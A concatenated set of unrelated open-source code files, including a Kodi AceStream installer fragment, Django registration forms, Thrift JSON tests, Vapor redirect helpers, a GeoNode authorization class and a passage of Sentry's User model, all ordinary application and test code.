if "arm" in os.uname()[4]: acefile = os.path.join("sdcard","Download",acestreamengine_apk_arm.split("/")[-1])
else: acefile = os.path.join("sdcard","Download",acestreamengine_apk_x86.split("/")[-1])
else:
dialog = xbmcgui.Dialog()
pasta = dialog.browse(int(0), translate(30105), 'myprograms')
if "arm" in os.uname()[4]: acefile = os.path.join(pasta,acestreamengine_apk_arm.split("/")[-1])
else: acefile = os.path.join(pasta,acestreamengine_apk_x86.split("/")[-1])
if "arm" in os.uname()[4]: download_tools().Downloader(acestreamengine_apk_arm,acefile,translate(30117),translate(30000))
else: download_tools().Downloader(acestreamengine_apk_x86,acefile,translate(30117),translate(30000))
if tarfile.is_tarfile(acefile):
download_tools().extract(acefile,pasta)
download_tools().remove(acefile)
xbmc.sleep(2000)
mensagemok(translate(30000),translate(30118),pasta,translate(30108))
mensagemok(translate(30000),translate(30119),translate(30120),translate(30121))
settings.setSetting('engine_app','1')
opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30122),translate(30123))
if opcao:
if os.path.exists(os.path.join("sdcard","Download")):
pasta = os.path.join("sdcard","Download")
if "arm" in os.uname()[4]: acefile = os.path.join("sdcard","Download",android_aceplayer_arm.split("/")[-1])
else: os.path.join("sdcard","Download",android_aceplayer_x86.split("/")[-1])
else:
dialog = xbmcgui.Dialog()
pasta = dialog.browse(int(0), translate(30105), 'myprograms')
if "arm" in os.uname()[4]: acefile = os.path.join(pasta,acestreamengine_apk_arm.split("/")[-1])
else: acefile = os.path.join(pasta,acestreamengine_apk_x86.split("/")[-1])
if "arm" in os.uname()[4]: download_tools().Downloader(android_aceplayer_arm,acefile,translate(30124),translate(30000))
else: download_tools().Downloader(android_aceplayer_x86,acefile,translate(30124),translate(30000))
if tarfile.is_tarfile(acefile):
download_tools().extract(acefile,pasta)
download_tools().remove(acefile)
xbmc.sleep(2000)
mensagemok(translate(30000),translate(30125),pasta,translate(30108))
opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30126))
if opcao:
settings.setSetting('engine_app','2')
if latest_version: settings.setSetting('acestream_version',value=latest_version)
mensagemok(translate(30000),translate(30127))
return
else:
mensagemok(translate(30000),translate(30109))
return | unknown | codeparrot/codeparrot-clean | ||
###
# Copyright (c) 2004, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('Utilities', True)
Utilities = conf.registerPlugin('Utilities')
# This is where your configuration variables (if any) should go. For example:
# conf.registerGlobalValue(Utilities, 'someConfigVariableName',
# registry.Boolean(False, """Help for someConfigVariableName."""))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: | unknown | codeparrot/codeparrot-clean | ||
"""
Forms and validation code for user user_registration.
"""
from django.contrib.auth.models import User
from django import forms
from django.utils.translation import ugettext_lazy as _
# I put this on all required fields, because it's easier to pick up
# on them with CSS or JavaScript if they have a class of "required"
# in the HTML. Your mileage may vary. If/when Django ticket #3515
# lands in trunk, this will no longer be necessary.
attrs_dict = { 'class': 'required' }
class RegistrationForm(forms.Form):
"""
Form for registering a new user account.
Validates that the requested username is not already in use, and
requires the password to be entered twice to catch typos.
Subclasses should feel free to add any additional validation they
need, but should avoid defining a ``save()`` method -- the actual
saving of collected user data is delegated to the active
registration backend.
"""
username = forms.RegexField(regex=r'^\w+$',
max_length=30,
widget=forms.TextInput(attrs=attrs_dict),
label=_("Username"),
error_messages={ 'invalid': _("This value must contain only letters, numbers and underscores.") })
email = forms.EmailField(widget=forms.TextInput(attrs=dict(attrs_dict,
maxlength=75)),
label=_("Email address"))
password1 = forms.CharField(widget=forms.PasswordInput(attrs=attrs_dict, render_value=False),
label=_("Password"))
password2 = forms.CharField(widget=forms.PasswordInput(attrs=attrs_dict, render_value=False),
label=_("Password (again)"))
def clean_username(self):
"""
Validate that the username is alphanumeric and is not already
in use.
"""
try:
user = User.objects.get(username__iexact=self.cleaned_data['username'])
except User.DoesNotExist:
return self.cleaned_data['username']
raise forms.ValidationError(_("A user with that username already exists."))
def clean(self):
"""
Verifiy that the values entered into the two password fields
match. Note that an error here will end up in
``non_field_errors()`` because it doesn't apply to a single
field.
"""
if 'password1' in self.cleaned_data and 'password2' in self.cleaned_data:
if self.cleaned_data['password1'] != self.cleaned_data['password2']:
raise forms.ValidationError(_("The two password fields didn't match."))
return self.cleaned_data
class RegistrationFormTermsOfService(RegistrationForm):
"""
Subclass of ``RegistrationForm`` which adds a required checkbox
for agreeing to a site's Terms of Service.
"""
tos = forms.BooleanField(widget=forms.CheckboxInput(attrs=attrs_dict),
label=_(u'I have read and agree to the Terms of Service'),
error_messages={ 'required': _("You must agree to the terms to register") })
class RegistrationFormUniqueEmail(RegistrationForm):
"""
Subclass of ``RegistrationForm`` which enforces uniqueness of
email addresses.
"""
def clean_email(self):
"""
Validate that the supplied email address is unique for the
site.
"""
if User.objects.filter(email__iexact=self.cleaned_data['email']):
raise forms.ValidationError(_("This email address is already in use. Please supply a different email address."))
return self.cleaned_data['email']
class RegistrationFormNoFreeEmail(RegistrationForm):
"""
Subclass of ``RegistrationForm`` which disallows registration with
email addresses from popular free webmail services; moderately
useful for preventing automated spam registrations.
To change the list of banned domains, subclass this form and
override the attribute ``bad_domains``.
"""
bad_domains = ['aim.com', 'aol.com', 'email.com', 'gmail.com',
'googlemail.com', 'hotmail.com', 'hushmail.com',
'msn.com', 'mail.ru', 'mailinator.com', 'live.com',
'yahoo.com']
def clean_email(self):
"""
Check the supplied email address against a list of known free
webmail domains.
"""
email_domain = self.cleaned_data['email'].split('@')[1]
if email_domain in self.bad_domains:
raise forms.ValidationError(_("Registration using free email addresses is prohibited. Please supply a different email address."))
return self.cleaned_data['email'] | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
import unittest
import math
from thrift.protocol import TSimpleJSONProtocol, TProtocol
from thrift.transport.TTransport import TMemoryBuffer
from thrift.util import Serializer
from SimpleJSONRead.ttypes import SomeStruct, Stuff, StuffMissing, Empty
def writeToJSON(obj):
trans = TMemoryBuffer()
proto = TSimpleJSONProtocol.TSimpleJSONProtocol(trans)
obj.write(proto)
return trans.getvalue()
def readStuffFromJSON(jstr, struct_type=Stuff):
stuff = struct_type()
trans = TMemoryBuffer(jstr)
proto = TSimpleJSONProtocol.TSimpleJSONProtocol(trans,
struct_type.thrift_spec)
stuff.read(proto)
return stuff
class TestSimpleJSONRead(unittest.TestCase):
def test_primitive_type(self):
stuff = Stuff(
aString="hello",
aShort=10,
anInteger=23990,
aLong=123456789012,
aDouble=1234567.9,
aBool=True)
j = writeToJSON(stuff)
stuff_read = readStuffFromJSON(j)
self.assertEqual(stuff_read.aString, "hello")
self.assertEqual(stuff_read.aShort, 10)
self.assertEqual(stuff_read.anInteger, 23990)
self.assertEqual(stuff_read.aLong, 123456789012)
self.assertEqual(stuff_read.aDouble, 1234567.9)
self.assertTrue(stuff_read.aBool)
def test_escape_string(self):
stuff = Stuff(
aString=b'\\"hello')
j = writeToJSON(stuff)
stuff_read = readStuffFromJSON(j)
self.assertEqual(stuff_read.aString, '\\"hello')
def test_unicode_in_binary_escape(self):
stuff = Stuff(
aBinary=b'\\"hello'.decode('utf-8'))
j = writeToJSON(stuff)
self.assertEqual(j, b'{\n "aBinary": "\\\\\\"hello"\n}')
stuff_read = readStuffFromJSON(j)
self.assertEqual(stuff_read.aBinary, b'\\"hello')
def test_unicode_string(self):
stuff = Stuff(
aString='año'.encode('utf-8'))
j = writeToJSON(stuff)
stuff_read = readStuffFromJSON(j)
if sys.version_info[0] == 3:
self.assertEqual(stuff_read.aString, 'año')
else:
self.assertEqual(stuff_read.aString, 'año'.encode('utf-8'))
def test_unusual_numbers(self):
j = '{ "aListOfDouble": ["inf", "-inf", "nan"]}'
stuff_read = readStuffFromJSON(j)
self.assertEqual(len(stuff_read.aListOfDouble), 3)
self.assertTrue(math.isinf(stuff_read.aListOfDouble[0]))
self.assertTrue(math.isinf(stuff_read.aListOfDouble[1]))
self.assertTrue(math.isnan(stuff_read.aListOfDouble[2]))
def test_unexpected_field(self):
j = '{ "anInteger": 101, "unexpected": 111.1}'
struct_read = readStuffFromJSON(j, struct_type=SomeStruct)
self.assertEqual(struct_read.anInteger, 101)
def test_map(self):
stuff = Stuff(
aMap={1: {"hello": [1,2,3,4],
"world": [5,6,7,8]},
2: {"good": [100, 200],
"bye": [300, 400]}
},
anotherString="Hey")
j = writeToJSON(stuff)
stuff_read = readStuffFromJSON(j)
self.assertEqual(len(stuff_read.aMap), 2)
self.assertEqual(stuff_read.aMap[1]["hello"], [1,2,3,4])
self.assertEqual(stuff_read.aMap[1]["world"], [5,6,7,8])
self.assertEqual(stuff_read.aMap[2]["good"], [100, 200])
self.assertEqual(stuff_read.aMap[2]["bye"], [300, 400])
self.assertEqual(stuff_read.anotherString, "Hey")
def test_list(self):
stuff = Stuff(
aList=[
[[["hello", "world"], ["good", "bye"]]],
[[["what", "is"], ["going", "on"]]]],
anotherString="Hey")
j = writeToJSON(stuff)
stuff_read = readStuffFromJSON(j)
self.assertEqual(len(stuff_read.aList), 2)
self.assertEqual(stuff_read.aList[0][0][0], ["hello", "world"])
self.assertEqual(stuff_read.aList[0][0][1], ["good", "bye"])
self.assertEqual(stuff_read.aList[1][0][0], ["what", "is"])
self.assertEqual(stuff_read.aList[1][0][1], ["going", "on"])
self.assertEqual(stuff_read.anotherString, "Hey")
def test_set(self):
stuff = Stuff(
aListOfSet=[set(["hello"]), set(["world"])],
anotherString="Hey")
j = writeToJSON(stuff)
stuff_read = readStuffFromJSON(j)
self.assertEqual(len(stuff_read.aListOfSet), 2)
self.assertEqual(stuff_read.aListOfSet[0], set(["hello"]))
self.assertEqual(stuff_read.aListOfSet[1], set(["world"]))
self.assertEqual(stuff_read.anotherString, "Hey")
def test_struct(self):
stuff = Stuff(
aStruct=SomeStruct(anInteger=12,
aMap={"hi": 1.5}),
aListOfStruct=[
SomeStruct(anInteger=10,
aMap={"good": 2.0}),
SomeStruct(anInteger=11,
aMap={"bye": 1.0})],
anotherString="Hey"
)
j = writeToJSON(stuff)
stuff_read = readStuffFromJSON(j)
self.assertEqual(len(stuff_read.aListOfStruct), 2)
self.assertEqual(stuff_read.aListOfStruct[0].anInteger, 10)
self.assertEqual(stuff_read.aListOfStruct[0].aMap["good"], 2.0)
self.assertEqual(stuff_read.aListOfStruct[1].anInteger, 11)
self.assertEqual(stuff_read.aListOfStruct[1].aMap["bye"], 1.0)
self.assertEqual(stuff_read.anotherString, "Hey")
def test_deserializer(self):
j = '{"aShort": 1, "anInteger": 2, "aLong": 3}'
stuff = Stuff()
Serializer.deserialize(
TSimpleJSONProtocol.TSimpleJSONProtocolFactory(), j, stuff)
self.assertEqual(stuff.aShort, 1)
self.assertEqual(stuff.anInteger, 2)
self.assertEqual(stuff.aLong, 3)
def test_foreign_json(self):
"""
Not all JSON that we decode will be encoded by this python thrift
protocol implementation. E.g. this encode implementation stuffs raw
unicode into the output, but we may use this implementation to decode
JSON from other implementations, which escape unicode (sometimes
incorrectly e.g. PHP). And we may use this implementation to decode
JSON that was not encoded by thrift at all, which may contain nulls.
"""
s = "a fancy e looks like \u00e9"
j = '{"aString": "a fancy e looks like \\u00e9", "anotherString": null, "anInteger": 10, "unknownField": null}'
stuff = Stuff()
Serializer.deserialize(
TSimpleJSONProtocol.TSimpleJSONProtocolFactory(), j, stuff)
self.assertEqual(stuff.aString, s)
def should_throw():
j = '{"aString": "foo", "anotherString": nullcorrupt}'
stuff = Stuff()
Serializer.deserialize(
TSimpleJSONProtocol.TSimpleJSONProtocolFactory(), j, stuff)
self.assertRaises(TProtocol.TProtocolException, should_throw)
def test_skip_unrecognized_fields(self):
stuff = Stuff(
aString="hello",
aShort=10,
anInteger=23990,
aLong=123456789012,
aDouble=1234567.9,
aBool=True,
aBinary=b'\\"hello'.decode('utf-8'),
aStruct=SomeStruct(anInteger=12,
aMap={"hi": 1.5}),
aList=[
[[["hello", "world"], ["good", "bye"]]],
[[["what", "is"], ["going", "on"]]]],
aMap={1: {"hello": [1, 2, 3, 4],
"world": [5, 6, 7, 8]},
2: {"good": [100, 200],
"bye": [300, 400]}},
anotherString="Hey",
aListOfStruct=[
SomeStruct(anInteger=10,
aMap={"good": 2.0}),
SomeStruct(anInteger=11,
aMap={"bye": 1.0})],
aListOfSet=[{"hello"}, {"world"}],
aListOfDouble=[0., 1.25, 10.],
anotherMap={3: {"foo": 1,
"bar": 12},
4: {"baz": 123,
"bazzz": 1234}})
j = writeToJSON(stuff)
stuff_read = readStuffFromJSON(j, struct_type=StuffMissing)
self.assertFalse(hasattr(stuff_read, "aString"))
self.assertFalse(hasattr(stuff_read, "aShort"))
self.assertEqual(stuff_read.anInteger, 23990)
self.assertFalse(hasattr(stuff_read, "aLong"))
self.assertEqual(stuff_read.aDouble, 1234567.9)
self.assertFalse(hasattr(stuff_read, "aBool"))
self.assertEqual(stuff_read.aBinary, b'\\"hello')
self.assertFalse(hasattr(stuff_read, "aStruct"))
self.assertEqual(len(stuff_read.aList), 2)
self.assertEqual(stuff_read.aList[0][0][0], ["hello", "world"])
self.assertEqual(stuff_read.aList[0][0][1], ["good", "bye"])
self.assertEqual(stuff_read.aList[1][0][0], ["what", "is"])
self.assertEqual(stuff_read.aList[1][0][1], ["going", "on"])
self.assertFalse(hasattr(stuff_read, "aMap"))
self.assertEqual(stuff_read.anotherString, "Hey")
self.assertFalse(hasattr(stuff_read, "aListOfStruct"))
self.assertEqual(len(stuff_read.aListOfSet), 2)
self.assertEqual(stuff_read.aListOfSet[0], {"hello"})
self.assertEqual(stuff_read.aListOfSet[1], {"world"})
self.assertFalse(hasattr(stuff_read, "aListOfDouble"))
self.assertEqual(len(stuff_read.anotherMap), 2)
self.assertEqual(stuff_read.anotherMap[3]["foo"], 1)
self.assertEqual(stuff_read.anotherMap[3]["foo"], 1)
self.assertEqual(stuff_read.anotherMap[3]["bar"], 12)
self.assertEqual(stuff_read.anotherMap[4]["baz"], 123)
self.assertEqual(stuff_read.anotherMap[4]["bazzz"], 1234)
stuff_read_2 = readStuffFromJSON(j, struct_type=Empty)
self.assertFalse(hasattr(stuff_read_2, "aString"))
self.assertFalse(hasattr(stuff_read_2, "aShort"))
self.assertFalse(hasattr(stuff_read_2, "anInteger"))
self.assertFalse(hasattr(stuff_read_2, "aLong"))
self.assertFalse(hasattr(stuff_read_2, "aDouble"))
self.assertFalse(hasattr(stuff_read_2, "aBool"))
self.assertFalse(hasattr(stuff_read_2, "aBinary"))
self.assertFalse(hasattr(stuff_read_2, "aStruct"))
self.assertFalse(hasattr(stuff_read_2, "aList"))
self.assertFalse(hasattr(stuff_read_2, "aMap"))
self.assertFalse(hasattr(stuff_read_2, "anotherString"))
self.assertFalse(hasattr(stuff_read_2, "aListOfStruct"))
self.assertFalse(hasattr(stuff_read_2, "aListOfSet"))
self.assertFalse(hasattr(stuff_read_2, "aListOfDouble"))
self.assertFalse(hasattr(stuff_read_2, "anotherMap"))
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
# Copyright(C) 2014 by Abe developers.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/agpl.html>.
from . import BaseChain
from .. import deserialize
class PpcPosChain(BaseChain):
"""
A blockchain with proof-of-stake as in Peercoin.
"""
def ds_parse_transaction(chain, ds):
return deserialize.parse_Transaction(ds, has_nTime=True)
def ds_parse_block(chain, ds):
d = BaseChain.ds_parse_block(chain, ds)
d['block_sig'] = ds.read_bytes(ds.read_compact_size())
return d | unknown | codeparrot/codeparrot-clean | ||
//===----------------------------------------------------------------------===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2023 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
#include "ExtractExprBase.h"
#include "RefactoringActions.h"
using namespace swift::refactoring;
bool RefactoringActionExtractExpr::isApplicable(const ResolvedRangeInfo &Info,
DiagnosticEngine &Diag) {
switch (Info.Kind) {
case RangeKind::SingleExpression:
// We disallow extract literal expression for two reasons:
// (1) since we print the type for extracted expression, the type of a
// literal may print as "int2048" where it is not typically users' choice;
// (2) Extracting one literal provides little value for users.
return checkExtractConditions(Info, Diag).success();
case RangeKind::PartOfExpression:
case RangeKind::SingleDecl:
case RangeKind::MultiTypeMemberDecl:
case RangeKind::SingleStatement:
case RangeKind::MultiStatement:
case RangeKind::Invalid:
return false;
}
llvm_unreachable("unhandled kind");
}
bool RefactoringActionExtractExpr::performChange() {
return RefactoringActionExtractExprBase(TheFile, RangeInfo, DiagEngine, false,
PreferredName, EditConsumer)
.performChange();
} | cpp | github | https://github.com/apple/swift | lib/Refactoring/ExtractExpr.cpp |
extension Request {
/// Creates a redirect `Response`.
///
/// router.get("redirect") { req in
/// return req.redirect(to: "https://vapor.codes")
/// }
///
/// Set type to '.permanently' to allow caching to automatically redirect from browsers.
/// Defaulting to non-permanent to prevent unexpected caching.
/// - Parameters:
/// - location: The path to redirect to
/// - type: The type of redirect to perform
/// - Returns: A response that provides a redirect to the specified location
@available(*, deprecated, renamed: "redirect(to:redirectType:)")
public func redirect(to location: String, type: RedirectType) -> Response {
let response = Response()
response.responseBox.withLockedValue { box in
box.status = type.status
box.headers.replaceOrAdd(name: .location, value: location)
}
return response
}
/// Creates a redirect `Response`.
///
/// router.get("redirect") { req in
/// return req.redirect(to: "https://vapor.codes")
/// }
///
/// Set type to '.permanently' to allow caching to automatically redirect from browsers.
/// Defaulting to non-permanent to prevent unexpected caching.
/// - Parameters:
/// - location: The path to redirect to
/// - redirectType: The type of redirect to perform
/// - Returns: A response that redirects the client to the specified location
public func redirect(to location: String, redirectType: Redirect = .normal) -> Response {
let response = Response()
response.responseBox.withLockedValue { box in
box.status = redirectType.status
box.headers.replaceOrAdd(name: .location, value: location)
}
return response
}
}
/// Specifies the type of redirect that the client should receive.
@available(*, deprecated, renamed: "Redirect")
public enum RedirectType {
/// A cacheable redirect. Not all user-agents preserve request method and body, so
/// this should only be used for GET or HEAD requests
/// `301 permanent`
case permanent
/// Forces the redirect to come with a GET, regardless of req method.
/// `303 see other`
case normal
/// Maintains original request method, ie: PUT will call PUT on redirect.
/// `307 Temporary`
case temporary
/// Associated `HTTPStatus` for this redirect type.
public var status: HTTPStatus {
switch self {
case .permanent: return .movedPermanently
case .normal: return .seeOther
case .temporary: return .temporaryRedirect
}
}
}
/// Specifies the type of redirect that the client should receive.
public struct Redirect {
let kind: Kind
/// A cacheable redirect. Not all user-agents preserve request method and body, so
/// this should only be used for GET or HEAD requests
/// `301 permanent`
public static var permanent: Redirect {
return Self(kind: .permanent)
}
/// Forces the redirect to come with a GET, regardless of req method.
/// `303 see other`
public static var normal: Redirect {
return Self(kind: .normal)
}
/// Maintains original request method, ie: PUT will call PUT on redirect.
/// `307 Temporary`
public static var temporary: Redirect {
return Self(kind: .temporary)
}
/// Redirect where the request method and the body will not be altered. This should
/// be used for POST redirects.
/// `308 Permanent Redirect`
public static var permanentPost: Redirect {
return Self(kind: .permanentPost)
}
/// Associated `HTTPStatus` for this redirect type.
public var status: HTTPStatus {
switch self.kind {
case .permanent: return .movedPermanently
case .normal: return .seeOther
case .temporary: return .temporaryRedirect
case .permanentPost: return .permanentRedirect
}
}
enum Kind {
case permanent
case normal
case temporary
case permanentPost
}
} | swift | github | https://github.com/vapor/vapor | Sources/Vapor/Request/Redirect.swift |
base_suite: change_streams_whole_cluster_passthrough
overrides:
- "change_streams.mongos_passthrough"
- "change_streams.secondary_reads"
- "change_streams.disable_write_noops"
- "change_streams.base_eval"
eval:
- "change_streams.secondary_reads_eval"
- "change_streams.whole_cluster_eval"
excludes:
- "change_streams.mongos_passthrough_excludes"
- "change_streams.secondary_reads_excludes" | unknown | github | https://github.com/mongodb/mongo | buildscripts/resmokeconfig/matrix_suites/mappings/change_streams_whole_cluster_secondary_reads_passthrough.yml |
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import threading
from mesos.interface import mesos_pb2
from twitter.common.metrics import LambdaGauge
from apache.aurora.executor.common.status_checker import (
StatusChecker,
StatusCheckerProvider,
StatusResult
)
from apache.aurora.executor.common.task_info import mesos_task_instance_from_assigned_task
from apache.thermos.monitoring.monitor import TaskMonitor
from apache.thermos.monitoring.resource import TaskResourceMonitor
class ResourceManager(StatusChecker):
""" Manage resources consumed by a Task """
def __init__(self, resources, resource_monitor):
"""
resources: Resources object specifying cpu, ram, disk limits for the task
resource_monitor: The ResourceMonitor to monitor resources
"""
self._resource_monitor = resource_monitor
# TODO(wickman) Remove cpu/ram reporting if MESOS-1458 is resolved.
self._max_cpu = resources.cpu().get()
self._max_ram = resources.ram().get()
self._max_disk = resources.disk().get()
self._kill_reason = None
self._kill_event = threading.Event()
@property
def _num_procs(self):
""" Total number of processes the task consists of (including child processes) """
return self._resource_monitor.sample()[1].num_procs
@property
def _ps_sample(self):
""" ProcessSample representing the aggregate resource consumption of the Task's processes """
return self._resource_monitor.sample()[1].process_sample
@property
def _disk_sample(self):
""" Integer in bytes representing the disk consumption in the Task's sandbox """
return self._resource_monitor.sample()[1].disk_usage
@property
def status(self):
sample = self._disk_sample
if sample > self._max_disk:
self._kill_event.set()
return StatusResult('Disk limit exceeded. Reserved %s bytes vs used %s bytes.' % (
self._max_disk, sample), mesos_pb2.TASK_FAILED)
def name(self):
return 'resource_manager'
def register_metrics(self):
self.metrics.register(LambdaGauge('disk_used', lambda: self._disk_sample))
self.metrics.register(LambdaGauge('disk_reserved', lambda: self._max_disk))
self.metrics.register(LambdaGauge('disk_percent',
lambda: 1.0 * self._disk_sample / self._max_disk))
self.metrics.register(LambdaGauge('cpu_used', lambda: self._ps_sample.rate))
self.metrics.register(LambdaGauge('cpu_reserved', lambda: self._max_cpu))
self.metrics.register(LambdaGauge('cpu_percent',
lambda: 1.0 * self._ps_sample.rate / self._max_cpu))
self.metrics.register(LambdaGauge('ram_used', lambda: self._ps_sample.rss))
self.metrics.register(LambdaGauge('ram_reserved', lambda: self._max_ram))
self.metrics.register(LambdaGauge('ram_percent',
lambda: 1.0 * self._ps_sample.rss / self._max_ram))
def start(self):
super(ResourceManager, self).start()
self.register_metrics()
self._resource_monitor.start()
class ResourceManagerProvider(StatusCheckerProvider):
def __init__(self, checkpoint_root, **resource_monitor_options):
self._checkpoint_root = checkpoint_root
self._resource_monitor_options = resource_monitor_options
def from_assigned_task(self, assigned_task, sandbox):
task_id = assigned_task.taskId
resources = mesos_task_instance_from_assigned_task(assigned_task).task().resources()
task_monitor = TaskMonitor(self._checkpoint_root, task_id)
resource_monitor = TaskResourceMonitor(
task_id,
task_monitor,
**self._resource_monitor_options)
return ResourceManager(resources, resource_monitor) | unknown | codeparrot/codeparrot-clean | ||
from tastypie.authorization import DjangoAuthorization
from tastypie.exceptions import Unauthorized
from guardian.shortcuts import get_objects_for_user
class GeoNodeAuthorization(DjangoAuthorization):
"""Object level API authorization based on GeoNode granular
permission system"""
def read_list(self, object_list, bundle):
permitted_ids = get_objects_for_user(
bundle.request.user,
'base.view_resourcebase').values('id')
return object_list.filter(id__in=permitted_ids)
def read_detail(self, object_list, bundle):
return bundle.request.user.has_perm(
'view_resourcebase',
bundle.obj.get_self_resource())
def create_list(self, object_list, bundle):
# TODO implement if needed
raise Unauthorized()
def create_detail(self, object_list, bundle):
return bundle.request.user.has_perm(
'add_resourcebase',
bundle.obj.get_self_resource())
def update_list(self, object_list, bundle):
# TODO implement if needed
raise Unauthorized()
def update_detail(self, object_list, bundle):
return bundle.request.user.has_perm(
'change_resourcebase',
bundle.obj.get_self_resource())
def delete_list(self, object_list, bundle):
# TODO implement if needed
raise Unauthorized()
def delete_detail(self, object_list, bundle):
return bundle.request.user.has_perm(
'delete_resourcebase',
bundle.obj.get_self_resource()) | unknown | codeparrot/codeparrot-clean | ||
from __future__ import absolute_import
import logging
import warnings
from bitfield import BitField
from django.contrib.auth.signals import user_logged_out
from django.contrib.auth.models import AbstractBaseUser, UserManager
from django.core.urlresolvers import reverse
from django.dispatch import receiver
from django.db import IntegrityError, models, transaction
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from sentry.db.models import BaseManager, BaseModel, BoundedAutoField, sane_repr
from sentry.models import LostPasswordHash
from sentry.utils.http import absolute_uri
audit_logger = logging.getLogger("sentry.audit.user")
class UserManager(BaseManager, UserManager):
def get_from_teams(self, organization_id, teams):
return User.objects.filter(
sentry_orgmember_set__organization_id=organization_id,
sentry_orgmember_set__organizationmemberteam__team__in=teams,
sentry_orgmember_set__organizationmemberteam__is_active=True,
is_active=True,
)
def get_from_projects(self, organization_id, projects):
"""
Returns users associated with a project based on their teams.
"""
return User.objects.filter(
sentry_orgmember_set__organization_id=organization_id,
sentry_orgmember_set__organizationmemberteam__team__projectteam__project__in=projects,
sentry_orgmember_set__organizationmemberteam__is_active=True,
is_active=True,
)
class User(BaseModel, AbstractBaseUser):
__core__ = True
id = BoundedAutoField(primary_key=True)
username = models.CharField(_("username"), max_length=128, unique=True)
# this column is called first_name for legacy reasons, but it is the entire
# display name
name = models.CharField(_("name"), max_length=200, blank=True, db_column=u"first_name")
email = models.EmailField(_("email address"), blank=True, max_length=75)
is_staff = models.BooleanField(
_("staff status"),
default=False,
help_text=_("Designates whether the user can log into this admin " "site."),
)
is_active = models.BooleanField(
_("active"),
default=True,
help_text=_(
"Designates whether this user should be treated as "
"active. Unselect this instead of deleting accounts."
),
)
is_superuser = models.BooleanField(
_("superuser status"),
default=False,
help_text=_(
"Designates that this user has all permissions without " "explicitly assigning them."
),
)
is_managed = models.BooleanField(
_("managed"),
default=False,
help_text=_(
"Designates whether this user should be treated as "
"managed. Select this to disallow the user from "
"modifying their account (username, password, etc)."
),
)
is_sentry_app = models.NullBooleanField(
_("is sentry app"),
null=True,
default=None,
help_text=_(
"Designates whether this user is the entity used for Permissions"
"on behalf of a Sentry App. Cannot login or use Sentry like a"
"normal User would."
),
)
is_password_expired = models.BooleanField(
_("password expired"),
default=False,
help_text=_(
"If set to true then the user needs to change the " "password on next sign in."
),
)
last_password_change = models.DateTimeField(
_("date of last password change"),
null=True,
help_text=_("The date the password was changed last."),
)
flags = BitField(
flags=(
(u"newsletter_consent_prompt", u"Do we need to ask this user for newsletter consent?"),
),
default=0,
null=True,
)
session_nonce = models.CharField(max_length=12, null=True)
date_joined = models.DateTimeField(_("date joined"), default=timezone.now)
last_active = models.DateTimeField(_("last active"), default=timezone.now, null=True)
objects = UserManager(cache_fields=[u"pk"])
USERNAME_FIELD = "username"
REQUIRED_FIELDS = ["email"]
class Meta:
app_label = "sentry"
db_table = "auth_user"
verbose_name = _("user")
verbose_name_plural = _("users")
__repr__ = sane_repr("id")
